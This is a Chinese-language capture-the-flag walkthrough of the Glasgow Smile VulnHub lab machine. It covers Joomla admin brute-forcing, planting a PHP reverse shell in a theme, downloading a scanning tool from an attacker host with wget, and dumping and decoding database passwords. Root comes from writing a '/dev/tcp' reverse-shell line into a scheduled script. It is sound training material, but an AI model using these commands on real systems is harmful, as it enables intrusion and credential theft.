靶机地址:https://www.vulnhub.com/entry/glasgow-smile-11,491/首先对目标地址进行端口扫描访问80界面来看看插件的内容以及dirb目录扫描的结果,这里发现了一个joomla的cms内容管理系统我们使用joomscan进行目录扫描joomscan --url http://10.10.10.129/joomla版本指纹为 Joomla 3.7.3rc1尝试一顿操作后,都登录不进去,找exp也没有,那么就来爆破后台地址http://10.10.10.129/joomla/administrator普通密码字典爆破失败后我又试着将index.php中的信息用cewl做成字典进行尝试cewl http://10.10.10.129/joomla > dict1.txt继续打开burp抓包,尝试admin进行爆破添加字典没有结果这里要使用这个默认的用户joomla此时的密码就爆破成功了来到后台的管理我们找到已启动的主题这里修改配置文件,为反弹shell的php(kali自带的)之后访问主页就能反弹成功了我们使用FeatherScanwget 10.10.10.128:8000/FeatherScanchmod +x FeatherScan./FeatherScan检查敏感文件/etc/passwd、/etc/shadow都不可写,以及sudo命令都不可以使用通过FeatherScan linux内网扫描工具扫描出来可能存在脏牛提权漏洞尝试一下是失败的,看样子是已经修复了的切换思路,我们来到cms的配置文件可以看到密码就是Gotham(刚刚爆破出来的结果)mysql -ujoomla -pbabyjokeruse joomla_dbuse mysqlselect User,Password from user;找到了root的解密结果为babyjoker切换任意一个用户试试看样子都没有效果,我们换一个数据库看看use batjokeselect * from taskforce;很好找到了这些密码,全部记下来并解密(base64)Bane:baneishereAaron:aaronishereCarnage:carnageisherebuster:busterishereffrob:???AllIHaveAreNegativeThoughts???aunt:auntis the fuck here发现rob用户存在,切换用户成功找到第一个flag这里有一个abner用户的求救文件,看样子是一个加密文件,那么是什么加密呢,从一封信的角度来看,对内容做隐藏让我想到了ROT13https://btsrk.me/,打开这个站点,我们对这个结果进行解密翻译结果如下简单来说就是让我们解密这段base64加密的结果STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==┌──(root㉿kali)-[/data/demo]└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -dI33hope99my0death000makes44more8cents00than0my0life0解密成功后就切换到这个用户找到第二个flag,又有一个提示信息,但是没什么用前面信息收集都搜集的差不多了(FeatherScan),直到我查看到了他的历史命令包含了这样一个东西找到这个文件的位置,还要我们输入密码find / -name .dear_penguins.zip 2>/dev/null下载下来尝试爆破,用kali自带的字典一顿操作没有结果后,我使用了当前用户的密码进行猜测,就成功了abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp<r/manifests/files$ unzip .dear_penguins.zip -d /tmpArchive: .dear_penguins.zip[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0inflating: /tmp/dear_penguins abner@glasgowsmile:/$ cd /tmpcd tmpabner@glasgowsmile:/tmp$ lslsdear_penguinsabner@glasgowsmile:/tmp$ cat dear_penguinscat dear_penguinsMy dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz就又看到一段密文scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz,再次切换用户试试在penguin用户中看到了一个find命令,且具有suid权限,很多人可能会想到find提权,但是这里可不是,下面看描述1、s(setuid 位):表示该文件在执行时,会以文件所有者(penguin)的权限运行,而不是执行者的权限。2、这里的所有者是penguin,所以find运行时会有penguin的权限(不是root)。我们来看下面这个文件,也是一个可执行文件,查看内容竟然是一个可执行sh脚本开始修改penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#/bin/sh'#/bin/shpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#!/bin/bash' > .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1' >> .trash_oldpenguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old#!/bin/bash/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ./.trash_old到此提权成功往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年07月18日
1,464 阅读
0 评论
0 点赞
1
...
3
4
5
...
15